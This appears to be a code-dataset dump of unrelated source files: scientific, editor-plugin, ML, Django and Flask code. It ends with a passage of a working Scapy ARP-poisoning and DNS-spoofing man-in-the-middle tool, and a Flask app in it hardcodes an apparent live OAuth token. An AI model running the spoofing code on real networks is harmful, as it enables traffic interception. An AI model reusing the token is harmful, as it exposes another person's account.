index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
997,700 | fba7c1f888701dee6d2b4e6fa3ec05b89de3003c | #!/usr/bin/env python
############################################################################
#
# Script: create-master.py
#
# Description: Compute BB and CH station lists into one master list
#
############################################################################
import os
import sys
import array
import getopt
import math
import random
# Domain side length
DOMAINLENGTHETA = 180e3
DOMAINLENGTHCSI = 135e3
# Location tolerance
TOL = 1e-3
class CreateMaster:
def __init__(self, argv):
self.argc = len(argv)
self.argv = argv
def usage(self):
print "Usage: " + sys.argv[0] + " <station file1> [station file2]"
print "Example: " + sys.argv[0] + " -m BB_station_xy.list CH_station_xy.list\n"
print "Example: " + sys.argv[0] + " BB_station_xy\n"
print "\t[-h] : This help message"
print "\t[-m] : Perform merge"
print "\t<stations file1> : Station list 1"
print "\t<stations file2> : Station list 2 (Optional, used in merge)"
sys.exit(1)
def main(self):
# Parse options
try:
opts, args = getopt.getopt(self.argv[1:], "hm", ["help", "merge"])
except getopt.GetoptError, err:
print str(err)
self.usage()
return(1)
# Defaults
domerge = False
for o, a in opts:
if o in ("-h", "--help"):
self.usage()
return(0)
elif o in ("-m", "--merge"):
domerge = True
else:
print "Invalid option %s" % (o)
return(1)
# Check command-line arguments
if ((domerge == True and len(args) != 2) or
(domerge == False and len(args) != 1)):
self.usage()
return(1)
sfile1 = args[0]
if (domerge):
sfile2 = args[1]
#print "Reading in station list %s" % (sfile1)
fp = open(sfile1, 'r')
sdata1 = fp.readlines()
fp.close()
if (domerge):
#print "Reading in station list %s" % (sfile2)
fp = open(sfile2, 'r')
sdata2 = fp.readlines()
fp.close()
master = []
# Preferred stations that must be included if they fit in sim box
#print "Merging station lists:"
for i in range(0, len(sdata1)):
stokens = sdata1[i].split()
snet1 = stokens[0]
ssta1 = stokens[1]
slon1 = float(stokens[2])
slat1 = float(stokens[3])
sx1 = float(stokens[4])
sy1 = float(stokens[5])
if ((sx1 >= 0.0) and (sx1 < DOMAINLENGTHETA) and (sy1 >= 0.0) and (sy1 < DOMAINLENGTHCSI)):
master.append([snet1, ssta1, slon1, slat1, sx1, sy1]);
#else:
# print('Station %s %s is outside of sim box (%f, %f)\n' % (snet1, ssta1, sx1, sy1));
if (domerge):
# Additional stations with possible duplicates that must be filtered
master2 = []
for i in range(0, len(sdata2)):
stokens = sdata2[i].split()
snet2 = stokens[0]
ssta2 = stokens[1]
slon2 = float(stokens[2])
slat2 = float(stokens[3])
sx2 = float(stokens[4])
sy2 = float(stokens[5])
# Find in master list
found = False
for m in range(0, len(master)):
mtokens = master[m]
mnet = mtokens[0]
msta = mtokens[1]
mlon = float(mtokens[2])
mlat = float(mtokens[3])
mx = float(mtokens[4])
my = float(mtokens[5])
if ((math.fabs(slon2 - mlon) < TOL) and
((math.fabs(slat2 - mlat) < TOL))):
#sys.stdout.write("%s %s duplicate of %s %s\n" % (snet2, ssta2, mnet, msta))
found = True
break;
# Append to new list to allow dupes in CH list
if (not found):
master2.append([snet2, ssta2, slon2, slat2, sx2, sy2]);
# Merge the two lists
master = master + master2
# Output merged list
sys.stdout.write("# net sta lon lat x y sta_id\n")
staid = 0
for m in range(0, len(master)):
mtokens = master[m]
mnet = mtokens[0]
msta = mtokens[1]
mlon = float(mtokens[2])
mlat = float(mtokens[3])
mx = float(mtokens[4])
my = float(mtokens[5])
stafile = "station.%d" % (staid)
sys.stdout.write("%5s\t%10s\t%14.6f\t%14.6f\t%14.6f\t%14.6f\t%14.6f\t%12s\n" % (mnet, msta, mlon, mlat, 0.0, mx, my, stafile))
staid = staid + 1
#print "Done"
return 0
if __name__ == '__main__':
prog = CreateMaster(sys.argv)
sys.exit(prog.main())
|
997,701 | b255f5b5d0ec7d184b8df76ae9b911572690f277 | '''
Helper functions for working with sublime
'''
import sublime
import sublime_plugin
def sublime_show_region(view, region):
''' Shows the region in the view (not moving if its already visible) '''
if not view.visible_region().intersects(region):
view.show_at_center(region)
def sublime_is_multiselect(view):
''' Figures out if we're in multiselect mode '''
selections = view.sel()
return len(selections) > 1
def sublime_is_visual(view):
''' Figures out if we're in visual mode '''
selections = view.sel()
# Is anything selecting at least one char? aka are we in block mode
# Note: Command Mode is identical to Insert mode (selection of no chars)
# except its displayed as a block cursor
# ONLY visual mode selects a char
return any(
(not sel.empty()) for sel in selections
)
class MetaWindowFactory(type):
'''
Factory: Singleton per window
Meta-Using classes:
view MUST be passed into __init__
self.window is always assigned
'''
def __init__(cls, name, bases, attrs, **kwargs):
cls._instances = {}
super().__init__(name, bases, attrs, **kwargs)
def __call__(cls, *args, **kwargs):
view = kwargs.pop('view', None)
window = kwargs.pop('window', None)
if window is None and view is not None:
window = view.window()
factory_id = window.id()
self = cls._instances.get(factory_id, None)
if self is None:
self = cls.__new__(cls, *args, **kwargs)
self.window = window
self.__init__(*args, **kwargs)
cls._instances[factory_id] = self
return self
class MetaViewFactory(type):
'''
Factory: Singleton per view
Meta-Using classes:
view MUST be passed into __init__
self.view is always assigned
'''
def __init__(cls, name, bases, attrs, **kwargs):
cls._instances = {}
super().__init__(name, bases, attrs, **kwargs)
def __call__(cls, *args, **kwargs):
view = kwargs.pop('view', None)
factory_id = view.id()
self = cls._instances.get(factory_id, None)
if self is None:
self = cls.__new__(cls, *args, **kwargs)
self.view = view
self.__init__(*args, **kwargs)
cls._instances[factory_id] = self
self.view = view
return self
class Viewport():
''' Saved viewport in a specific view '''
def __init__(self, view):
self.view = view
self.__viewport = view.viewport_position()
def load(self):
''' Reloads this viewport '''
self.view.window().focus_view(self.view)
self.view.set_viewport_position(self.__viewport)
class QuickPanelFinder(metaclass=MetaWindowFactory):
''' One-Use listener that gives you back the view of the quickpanel '''
def __init__(self):
''' Creates a listener '''
self.listener = None
def listen(self, callback):
''' Callback that returns the view when the quickpanel opens '''
if self.listener is not None:
raise RuntimeError("Existing Listener: Another quickpanel is also opening?")
self.listener = callback
def cancel(self, callback):
''' Removes a listener in case something went wrong '''
if self.listener is callback:
self.listener = None
def on_open(self, view):
''' Event: called when a quickpanel opens '''
if not self.listener:
return
try:
self.listener(view)
finally:
self.listener = None
class QuickPanelListener(sublime_plugin.EventListener):
''' Listener for a quickpanel '''
def on_activated(self, view):
''' This method is called whenever a view (tab, quick panel, etc.) gains focus '''
if view is None:
return
window = view.window()
if window is None:
# This is some subpanel, Not relevant
return
QuickPanelFinder(view=view).on_open(view)
# --------------------------------------------------------------------------------------------------
def closest_visible(selection, visible_region=None, inverted=False):
''' Returns the first region which is fully visible.
If nothing is visible, a random selection is returned
visible_region = view.visible_region()
'''
if len(selection) == 0:
# Nothing to choose from...
return None
if visible_region is None or len(selection) == 1:
# Since nothing seems visible, then the very first selection
# is our default 'closest'
return selection[0]
# Find the first region which is withing our viewport
for region in selection:
if visible_region.contains(region):
# We found one inside the viewport!
return region
elif not inverted and visible_region.begin() <= region.begin():
# We've Gone past the viewport, just take the next one
return region
elif inverted and visible_region.end() <= region.end():
# We've gone past the viewport, just take the next one
return region
# We've hit the end... loop back to the first one
return selection[0]
class CursorMatch(object):
''' Show that this region is special (is the one the viewport should jump to '''
# pylint: disable=too-few-public-methods
def __init__(self, cursor, region, is_visible=False):
''' Stores a region '''
self.region = region
self.orig = cursor
self.is_visible = is_visible
def cursor_to_matches(*, cursors, matches, viewport, inverted=False, find_visible_only=False):
''' Loops through and generates a new set of cursors to jump to
a VisibleMatch() is yielded if that is the best region to show the user
'''
matches = list(matches)
if len(matches) == 0:
# There is no such thing as 'next'
return
# We'll be messing with the list, duplicate it
cursors = list(cursors)
# Invert our jump
if inverted:
# Sublime merges adjacent regions, so they cannot overlap
# THUS inverting it results in a sorted (backwards) list
cursors = [cursor for cursor in cursors[::-1]]
matches = matches[::-1]
# Find the closest cursor to the visible regions
if len(cursors) == 0:
# There is no cursor to jump from?
# Just go to a visible match
new_visible = closest_visible(matches, viewport, inverted=inverted)
# And theres no cursors to 'jump'... finish off
yield CursorMatch(None, new_visible, is_visible=True)
return
# Find the first cursor that is visible
visible_cursor = closest_visible(cursors, viewport, inverted=inverted)
# If we just want the visible cursor only (aka only the new viewport focus)
# Then pretend we only have one cursor... the closest visible one
if find_visible_only:
cursors = [visible_cursor]
# Used when cursors no longer see a match after them
# They all loop around to the first one
loop_match = matches[0]
# The search has Multiple Stages, this ensures we keep circling through them
# until we're done
limit = LoopLimit(
'Overflowed the search, either there were too many items (over 10000), '
'or there is an infinite loop bug'
)
while len(matches) and len(cursors):
limit.count()
# Stage 1: Drop matches that are before ANY Cursors
while len(matches) and (
# Normal means we're going forwards (compare the starts)
(not inverted and cursors[0].begin() >= matches[0].begin())
# Inverted means we're going backwards (compare the ends)
or (inverted and cursors[0].end() <= matches[0].end())
):
limit.count()
# Drop elements before the cursor
matches.pop(0)
# Stage 2: Early Abort (no Matches left!)
if len(matches) == 0:
# We've exhausted the search
# Replace all remaining cursors with the looped match
yield CursorMatch(None, loop_match, is_visible=(visible_cursor in cursors))
return
# Stage 3: Jump cursors that are before the next match (with that match)
was_visible = False
replaced_cursors = []
while len(cursors) and (
(not inverted and cursors[0].begin() <= matches[0].begin())
or (inverted and cursors[0].end() >= matches[0].end())
):
limit.count()
# We found the 'visible cursor' note that down
if cursors[0] == visible_cursor:
was_visible = True
# Replace cursors before the match
replaced_cursors.append(cursors.pop(0))
# All the cursors we just dropped go to this match
yield CursorMatch(
(replaced_cursors[0] if replaced_cursors else None),
matches[0],
is_visible=was_visible,
)
# -------------------------------------------------------------------------------------------------
# Misc helpers
# NON SUBLIME
import itertools
class Sentinel:
''' Sentinel Value '''
def __repr__(self):
return self.__class__.__name__
def pairwise(iterable, include_tail=False):
"""
s -> (s0,s1), (s1,s2), (s2, s3), ...
s, True -> (s0, s1) ... (sn-1, sn), (sn, None)
"""
left, right = itertools.tee(iterable)
next(right, None)
if include_tail:
right = itertools.chain(right, [None])
return zip(left, right)
class LoopLimit(Exception):
''' Counts loop counters until yourun out, then raises itself as an error '''
def __init__(self, message=None, limit=1000):
self.counter = limit
super().__init__(message)
def count(self):
''' Counts down to the limit, crashes if its reached '''
self.counter -= 1
if self.counter <= 0:
raise self
|
997,702 | c8ea14bfe7c83991e05b32bd350fed1ba755cd18 | #python 3.8
from numpy.random import dirichlet
from typing import List
from MuZeroConfig import MuZeroConfig
from Action import Action
from Player import Player
class Node(object):
def __init__(self, prior: int, to_play: Player, hidden_state = None, discount: float = 1.):
self.visit_count = 0
self.prior = prior
self.to_play = to_play
self.value_sum = 0
self.children = []
self.hidden_state = hidden_state
self.discount = discount
self.reward = 0
def expand(self, actions: List[Action], hidden_state, policy, value):
moves = [[action, policy[0, action.index].item()] for action in actions]
p_sum = policy.sum().item()
next_player = Player(-self.to_play.player)
for action, p in moves:
subnode = Node(p / p_sum, next_player, hidden_state)
self.children.append([action, subnode])
def addNoise(self, config: MuZeroConfig):
noise = dirichlet([config.root_dirichlet_alpha] * len(self.children))
for i in range(len(self.children)):
self.children[i][1].prior = self.children[i][1].prior * (
1 - config.root_exploration_fraction) + noise[i] * config.root_exploration_fraction
def expanded(self) -> bool:
return len(self.children) > 0
def value(self) -> float:
return 0 if self.visit_count == 0 else self.value_sum / self.visit_count
|
997,703 | bb4f25f230b1d8a0e2d5a524f7053d8795d61afb | given = "sausage"
back = ""
for digit in range(3):
back += given[2*digit]
print(back)
|
997,704 | 71cf2600a82b3c2c7d434a95c066cc419b263300 | from django.shortcuts import render
from django.http import JsonResponse
from rest_framework.decorators import api_view
from rest_framework.response import Response
from .serializers import ProductSerializer
from .models import Product
import django_filters.rest_framework
from rest_framework import status
# Create your views here.
@api_view(['GET'])
def apiOverview(request):
api_urls = {
'All Products List' : '/product-list/',
'Detailed View' : '/product-details/<str:pk>/',
'Register Product' : '/product-register/',
'Available Products List' : '/product-list-available/',
'Out of Stock Products List' : '/product-list-soldout/',
'Register Product Quantity Change' : '/product-quantity-change/<str:pk>/<str:quantity>/'
}
return Response(api_urls)
@api_view(['GET'])
def productList(request):
products = Product.objects.all()
serializer = ProductSerializer(products, many=True)
return Response(serializer.data)
@api_view(['GET'])
def productDetails(request, pk):
try:
products = Product.objects.get(sku=pk)
serializer = ProductSerializer(products, many=False)
return Response(serializer.data)
except Product.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
@api_view(['GET'])
def productListAvailable(request):
products = Product.objects.all().exclude(quantity=0)
serializer = ProductSerializer(products, many=True)
return Response(serializer.data)
@api_view(['GET'])
def productListSoldOut(request):
products = Product.objects.filter(quantity=0)
serializer = ProductSerializer(products, many=True)
return Response(serializer.data)
@api_view(['POST'])
def productRegister(request):
serializer = ProductSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.data, status=status.HTTP_400_BAD_REQUEST)
@api_view(['PATCH'])
def productQuantityChange(request, pk, quantity):
products = Product.objects.get(sku=pk)
data = {'quantity': products.quantity + int(quantity)}
serializer = ProductSerializer(products, data=data, partial=True)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
|
997,705 | 208f1f5678d54279fbd4bcfadaca290d462a49b9 | from flask import Flask
import redis
from bson import json_util
from config import *
from mongo_client import Mongo
app = Flask(__name__)
mongo_client = Mongo()
redis_client = redis.Redis.from_url(REDIS_DSN)
@app.route('/')
def healthy():
return "OK", 200
@app.route('/collection/<collection>/id/<document_id>')
def fetch(collection, document_id):
return get_from_cache_or_mongo(collection, document_id), 200
def get_from_cache_or_mongo(collection, document_id):
key = f'mongodb:{collection}:{document_id}'
result = get_from_cache(key)
if result is None:
result = mongo_client.find_one(collection, document_id)
redis_client.set(key, json_util.dumps(result))
return result
def get_from_cache(key):
result = redis_client.get(key)
if result is None:
return result
return json_util.loads(result)
if __name__ == '__main__':
app.run(host='0.0.0.0', port=PORT, debug=DEBUG_MODE)
|
997,706 | ffe6d25356bcd18bf3b1642891d82a63580f76a0 | from __future__ import annotations
import argparse
import dxtbx.util
from dxtbx.sequence_filenames import find_matching_images
def run(args=None):
dxtbx.util.encode_output_as_utf8()
parser = argparse.ArgumentParser(
description="Find images that match a template specification"
)
parser.add_argument(
"template", help="The template specification", metavar="TEMPLATE"
)
options = parser.parse_args(args)
for mi in find_matching_images(options.template):
print(mi)
if __name__ == "__main__":
run()
|
997,707 | feeab94d6ef30b3107bf1159ce592ac304c686d0 | # Generated by Django 3.0.7 on 2020-06-18 23:13
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('filmsnob', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='movies',
old_name='movie_name',
new_name='movie_title',
),
]
|
997,708 | c5d40325fb37267244f921cc7370abd557e85b40 | def graphDistances(g, s):
g=Graph(g)
return g.dijkstra(s)
class Graph():
def __init__(self, graph):
self.V = len(graph)
self.graph = graph
def minDistance(self, dist, SPT):
# Initilaize min distance as large int to represent ~INF
min_ = 1e9
# Search not nearest vertex not in Shortest Path Tree
for v in range(self.V):
if dist[v]!=-1 and dist[v] < min_ and not SPT[v] :
min_ = dist[v]
min_index = v
return min_index
# Dijkstra's single source graph algorithm
def dijkstra(self, sourceNode):
print('Dijkstra')
dist = [1e9] * self.V
dist[sourceNode] = 0
SPT = [0] * self.V
# loop size(v) times to find all vertecies
for _ in range(self.V):
print('d:',dist)
print('spt:',SPT)
# find closest vertex not in SPT
u = self.minDistance(dist, SPT)
# mark vertex found (vertex in SPT)
SPT[u] = 1
# update distance values for adjacent verticies
# if (new distance to vertex is less and vertex not in SPT)
for v in range(self.V):
if self.graph[u][v] >= 0 and not SPT[v] and dist[v] > dist[u] + self.graph[u][v]:
dist[v] = dist[u] + self.graph[u][v]
return dist
|
997,709 | 16415d1a9fd7cc52d05e7b623110a65f60cddaba | from flask import Flask, jsonify, request, render_template, session, redirect, g, flash, url_for, make_response
from flask_cors import CORS, cross_origin
import requests
import urllib
from yandex_music import Client, exceptions
from dl.models import SentimentDiscovery
import multiprocessing as mp
import numpy as np
import random
import uuid
import json
from datetime import datetime
import pandas as pd
import plotly
import plotly.graph_objects as go
import plotly.express as px
from get_songs_data import SongProcessing
import json
from json import JSONEncoder
import sys
import traceback
client_id = 'none'
client_secret = 'none'
sd_model = SentimentDiscovery()
test_data = { "anger_lyrics": [ 0.0, 0.0, 0.4400000050663948, 0.0, 0.0, 0.07000000153978665 ], "anticipation_lyrics": [ 0.0, 0.0, 0.0, 0.0, 0.0, 0.009999999776482582 ], "disgust_lyrics": [ 0.0, 0.0, 0.8350000083446503, 0.0, 0.0, 0.07444444422920544 ], "fear_lyrics": [ 0.15000000596046448, 0.0, 0.07500000018626451, 0.0, 0.0, 0.0 ], "is_angry_music": [ 0.0, 0.0, 0.0, 2.0, 0.0, 1.0 ], "is_happy_music": [ 0.0, 2.0, 2.0, 3.0, 1.0, 6.0 ], "is_relaxed_music": [ 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ], "is_sad_music": [ 1.0, 0.0, 0.0, 0.0, 0.0, 0.0 ], "joy_lyrics": [ 0.6899999976158142, 0.0, 0.0, 0.0, 0.0, 0.17222221692403158 ], "main_mood": [ "joy", "joy", "disgust", "joy", "joy", "joy" ], "sadness_lyrics": [ 0.009999999776482582, 0.0, 0.635000005364418, 0.0, 0.0, 0.005555555431379212 ], "surprise_lyrics": [ 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ], "timestamp": [ "2021-07-30", "2021-07-31", "2021-08-06", "2021-08-08", "2021-08-09", "2021-08-21" ], "trust_lyrics": [ 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ]}
class NumpyEncoder(JSONEncoder):
def default(self, obj):
if isinstance(obj, np.float32):
return obj.astype(float)
elif isinstance(obj, np.float16):
return obj.astype(float)
elif isinstance(obj, np.float64):
return obj.astype(float)
elif isinstance(obj, np.int32):
return obj.astype(int)
elif isinstance(obj, np.int64):
return obj.astype(int)
elif isinstance(obj, np.ndarray):
return obj.tolist()
else:
return JSONEncoder.default(self, obj)
def get_test_plot(data):
songs_count = sum(data['is_angry_music'])+\
sum(data['is_happy_music']) + \
sum(data['is_relaxed_music']) + \
sum(data['is_sad_music'])
data_df = pd.DataFrame(data)
data_df['day_sn'] = data_df['is_angry_music'] + data_df['is_happy_music'] + data_df['is_relaxed_music'] + data_df['is_sad_music']
data_df['angry_music_perc'] = data_df['is_angry_music']/data_df['day_sn']
data_df['happy_music_perc'] = data_df['is_happy_music'] / data_df['day_sn']
data_df['relaxed_music_perc'] = data_df['is_relaxed_music'] / data_df['day_sn']
data_df['sad_music_perc'] = data_df['is_sad_music'] / data_df['day_sn']
data_df['Спокойствие'] = data_df['trust_lyrics'] + 0.25*data_df['relaxed_music_perc']
data_df['Ярость'] = data_df['anger_lyrics'] + 0.25*data_df['angry_music_perc']
data_df['Восторг'] = data_df['anticipation_lyrics']
data_df['Веселье'] = data_df['joy_lyrics'] + 0.25*data_df['happy_music_perc']
data_df['Неприязнь'] = data_df['disgust_lyrics']
data_df['Страх'] = data_df['fear_lyrics']
data_df['Удивление'] = data_df['surprise_lyrics']
data_df['Грусть'] = data_df['sadness_lyrics'] + 0.25*data_df['sad_music_perc']
emts = ['Спокойствие', 'Ярость', 'Восторг', 'Веселье',
'Неприязнь', 'Страх', 'Удивление', 'Грусть']
def get_main_emotion(x):
vls = list(x[emts])
return emts[vls.index(max(vls))]
data_df['main_mood'] = data_df.apply(get_main_emotion, axis=1)
v_map = {
'Ярость': -3,
'Страх': -2,
'Неприязнь': -1,
'Грусть': 0,
'Спокойствие': 1,
'Удивление': 2,
'Восторг': 3,
'Веселье': 4
}
sms = [data_df[e].sum() for e in emts]
pie_df = pd.DataFrame({
"Настроение": emts,
"Величина": sms
})
st_b_d = {'Дата': [], 'Настроение': [], 'Величина': []}
l_d = {'Дата': [], 'Настроение': [], 'Величина': [], 'z':[]}
for ts in data['timestamp']:
k = data_df[data_df['timestamp'] == ts]['main_mood'].values[0]
v = v_map[k]
l_d['Дата'].append(datetime.strptime(ts, '%Y-%m-%d'))
l_d['Настроение'].append(k)
l_d['Величина'].append(v)
l_d['z'].append(5)
for e in emts:
st_b_d['Дата'].append(ts)
st_b_d['Настроение'].append(e)
st_b_d['Величина'].append(round(data_df[data_df['timestamp'] == ts][e].values[0], 2))
bar_df = pd.DataFrame(st_b_d)
line_df = pd.DataFrame(l_d)
cdm = {
'Ярость': '#FF6F76',
'Страх': '#FFCA2D',
'Неприязнь': '#6DCE8A',
'Грусть': '#8D92A5',
'Спокойствие': '#97F3FD',
'Удивление': '#FDB5B5',
'Восторг': '#D076FF',
'Веселье': '#52A3FD'
}
color_scale = [
[0.0, '#FF6F76'],
[0.125, '#FFCA2D'],
[0.25, '#6DCE8A'],
[0.375, '#8D92A5'],
[0.625, '#97F3FD'],
[0.75, '#FDB5B5'],
[0.875, '#D076FF'],
[1.0, '#52A3FD']
]
pie_fig = px.pie(pie_df, values="Величина", names="Настроение",
template='plotly_dark',
color="Настроение",
color_discrete_map=cdm)
pie_fig.update_traces(textinfo='none', hoverinfo='label')
pie_fig.layout.plot_bgcolor = "#292E43"
pie_fig.layout.paper_bgcolor = "#292E43"
bar_fig = px.bar(bar_df, x="Дата", y="Величина",
template='plotly_dark',
color="Настроение",
color_discrete_map=cdm)
bar_fig.layout.plot_bgcolor = "#292E43"
bar_fig.layout.paper_bgcolor = "#292E43"
bar_fig.update_yaxes(visible=False)
bar_fig.update_layout(barnorm="percent")
fig1 = px.line(line_df, x="Дата", y="Величина")
fig1.update_traces(line=dict(color='#ECF8F7'))
fig2 = px.scatter(line_df, x='Дата', y='Величина',
template='plotly_dark',
color='Настроение',
color_discrete_map=cdm,
size='z'
# trendline="rolling",
# trendline_options=dict(window=1)
)
line_fig = go.Figure(data=fig1.data + fig2.data)
line_fig.layout.plot_bgcolor = "#292E43"
line_fig.layout.paper_bgcolor = "#292E43"
line_fig.update_yaxes(visible=False)
line_fig.update_layout(template='plotly_dark')
line_fig.update_traces(line_shape='spline')
return json.dumps(pie_fig, cls=plotly.utils.PlotlyJSONEncoder), \
json.dumps(bar_fig, cls=plotly.utils.PlotlyJSONEncoder), \
json.dumps(line_fig, cls=plotly.utils.PlotlyJSONEncoder)
def get_plots():
return
def create_app(app_name='YAMOOD_API'):
app = Flask(app_name)
app.secret_key = 'rand'+str(random.random())
CORS(app, resources={r"/api/*": {"origins": "*"}})
@app.route('/')
def main_page():
at = request.cookies.get('access_token')
if at:
if request.args.get('n'):
num_tracks = int(request.args.get('n'))
else:
num_tracks = 20
y_clnt = Client(at)
g.user = {
'username': y_clnt.me.account.login,
'access_token': at
}
try:
data = SongProcessing.get_user_stats(at,
num_tracks,
sd_model)
except BaseException as e:
error = "Что-то пошло не так( Показываем тестовых рыбов"
ex_type, ex_value, ex_traceback = sys.exc_info()
# Extract unformatter stack traces as tuples
trace_back = traceback.extract_tb(ex_traceback)
# Format stacktrace
stack_trace = list()
for trace in trace_back:
stack_trace.append("File : %s , Line : %d, Func.Name : %s, Message : %s" % (
trace[0], trace[1], trace[2], trace[3]))
flash("File : %s , Line : %d, Func.Name : %s, Message : %s" % (
trace[0], trace[1], trace[2], trace[3]))
data = test_data
flash(str(e))
flash(error)
print("Exception type : %s " % ex_type.__name__)
print("Exception message : %s" % ex_value)
print("Stack trace : %s" % stack_trace)
flash("Exception type : %s " % ex_type.__name__)
flash("Exception message : %s" % ex_value)
pieJSON, barJSON, lineJSON = get_test_plot(data)
resp = make_response(render_template('notdash.html', pieJSON=pieJSON, barJSON=barJSON, lineJSON=lineJSON))
resp.set_cookie('access_token', at, max_age=60 * 60 * 24 * 365 * 2)
return resp
else:
return render_template('login.html')
@app.route('/get_songs_history')
def songs_history():
session['access_token'] = 'AgAAAAAh7Vk7AAG8XtDkZzG_PEYLjGVYMIVdDQE'
if 'access_token' in session:
num_tracks = int(request.args.get('n'))
final_chart_json = SongProcessing.get_user_stats(session['access_token'],
num_tracks,
sd_model)
return final_chart_json, 200
else:
return redirect('/')
@app.route('/dash_test', methods=['GET', 'POST'])
def notdash():
pieJSON, barJSON = get_test_plot(session['access_token'])
return render_template('notdash.html', pieJSON=pieJSON, barJSON=barJSON)
@app.route('/api/get_text_emotions', methods=['POST'])
@cross_origin()
def text_emotions():
if request.method == "POST":
request_data = request.get_json()
text = request_data['text']
fn = f'dl/data/data{uuid.uuid4()}.csv'
with open(fn, 'w') as f:
f.write('text\n'+text.replace("\n", " "))
res = sd_model.classify(fn)
print(res)
return {'result': str(res)}, 200
return jsonify({
'statusCode': 400
}), 400
@app.route('/api/get_text_emotions_batch', methods=['POST'])
@cross_origin()
def text_emotions_batch():
if request.method == "POST":
request_data = request.get_json()
texts = request_data['texts']
fn = f'dl/data/data{uuid.uuid4()}.csv'
with open(fn, 'w') as f:
f.write('text\n')
for t in texts:
f.write('"'+t.replace("\n", " ").replace('"', '\\"')+'"\n')
res = np.round(sd_model.classify(fn)[1], 2)
print(res)
return {'result': str(res)}, 200
return jsonify({
'statusCode': 400
}), 400
def get_client(code):
token_auth_uri = f"https://oauth.yandex.ru/token"
headers = {
'Content-type': 'application/x-www-form-urlencoded',
}
query = {
'grant_type': 'authorization_code',
'code': code,
'client_id': client_id,
'client_secret': client_secret,
}
query = urllib.parse.urlencode(query)
resp = requests.post(token_auth_uri, data=query, headers=headers)
print(resp.text)
rj = resp.json()
return rj['access_token']
def get_client_from_cred(un, pwd):
return Client.from_credentials(un, pwd).token
@app.route('/auth', methods=['POST', 'GET'])
@cross_origin()
def auth():
if request.method == "GET":
code = request.args.get('code')
token = get_client(code)
session['access_token'] = token
return redirect('/')
elif request.method == "POST":
username = request.form.get('username')
password = request.form.get('password')
error = None
if not username:
error = 'Введите логин'
elif not password:
error = 'Введите пароль'
if error is None:
try:
token = get_client_from_cred(username, password)
session['access_token'] = token
resp = make_response(redirect('/'))
resp.set_cookie('access_token', token, max_age=60 * 60 * 24 * 365 * 2)
return resp
except Exception as e:
flash(str(e))
error = "Неудалось войти... Вероятный диагноз -- неверный пароль("
flash(error)
return render_template('login.html')
@app.route('/logout', methods=['POST', 'GET'])
@cross_origin()
def logout():
session.clear()
resp = make_response(redirect(url_for('main_page')))
resp.set_cookie('access_token', '', expires=0)
return resp
return app
if __name__ == "__main__":
app = create_app()
app.run(host='0.0.0.0', debug=True, threaded=True)
|
997,710 | eaa343eb6ed95e7307d889eb87e740cf350bd684 | from bs4 import BeautifulSoup
import requests
import json
def gather_urls():
r = requests.get("http://www.politico.com/")
soup = BeautifulSoup(r.text, 'html.parser')
divs = soup.find_all('div', class_='fig-graphic')
return [div.find('a')['href'] for div in divs if div.find('a')]
def parse_data(url):
r = requests.get(url)
soup = BeautifulSoup(r.text, 'html.parser')
created_at = soup.find('p', class_='timestamp').find('time')['datetime']
updated_at = soup.find('p', class_='updated').find('time')['datetime']
js_string = soup.findAll('script')[13].string.split(';')[0].split('= ')[1].strip()
data = json.loads(js_string)
data['created_at'] = created_at
data['updated_at'] = updated_at
return data
|
997,711 | 7bbd8a519f59ff891290a7011fb74f65a152f697 | from django import forms
class CreateForm(forms.Form):
title = forms.CharField(label='Title', max_length=300, widget=forms.TextInput(attrs={'class': 'form-control'}))
text = forms.CharField(label='Text', widget=forms.Textarea(attrs={'class': 'form-control'}))
|
997,712 | 907fd2b337ddfd4b661b1ac2ecc8f48242e3c3ca | fout=open('fib.txt','wt')
def fib(num):
count = 1
a = 1
b = 1
print(count, a, file=fout)
while(count < num):
a, b = b, a+b
count += 1
print(count, a, file=fout)
fib(1000)
fout.close() |
997,713 | 54b9bb8a20b775fbff396831746a265eb1a51362 | """
MITM DNS Poisoning script
Developed by:
- Hiro
- Hiram
"""
from scapy.all import *
from collections import deque
import threading
import time
import sys
"""
Poisons gateway's and client's ARP tables, so packets are redirected the
attacker machine.
"""
class ARPPoisonThread(threading.Thread):
def __init__( self,\
targetip,\
gatewayip,\
name='arpoison'
):
""" constructor, setting initial variables """
self._stopevent = threading.Event( )
self._sleepperiod = 1.0
threading.Thread.__init__(self, name=name)
self.targetip = targetip
self.gatewayip = gatewayip
def _getmac(self, targetip):
arppacket = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op=1, pdst=targetip)
targetmac = srp(arppacket)[0][0][1].hwsrc
return targetmac
def _poisonarpcache(self, targetip, targetmac, sourceip):
spoofed = ARP(op=2 , pdst=targetip, psrc=sourceip, hwdst= targetmac)
send(spoofed)
def _restorearp(self, targetip, targetmac, sourceip, sourcemac):
packet = ARP( op=2,\
hwsrc=sourcemac,\
psrc= sourceip,\
hwdst= targetmac,\
pdst= targetip)
send(packet)
print ("ARP Table restored to normal for", targetip)
def run(self):
try:
self.targetmac = self._getmac(self.targetip)
except:
print("Target machine did not respond to ARP broadcast")
quit()
try:
self.gatewaymac= self._getmac(self.gatewayip)
except:
print("Gateway is unreachable")
quit()
print ("Sending spoofed ARP replies")
while True:
time.sleep(5)
self._poisonarpcache(self.targetip, self.targetmac, self.gatewayip)
self._poisonarpcache(self.gatewayip, self.gatewaymac, self.targetip)
def join(self, timeout=None):
print ("ARP spoofing stopped")
self._restorearp( self.gatewayip,\
self.gatewaymac,\
self.targetip,\
self.targetmac)
self._restorearp( self.targetip,\
self.targetmac,\
self.gatewayip,\
self.gatewaymac)
threading.Thread.join(self, timeout)
class DNSPoisonThread(threading.Thread):
def __init__( self,\
site,\
targetip,\
name='dnspoison'):
""" constructor, setting initial variables """
threading.Thread.__init__(self, name=name)
self.site = site
self.targetip = targetip
def _analysis(self, packet):
#Performs checks, whether DNS response contains our gold or not.
if self.site in packet[DNSQR].qname.decode('UTF-8'):
udp_packet = (Ether(src=packet[Ether].dst, dst=packet[Ether].src, type = "IPv4")
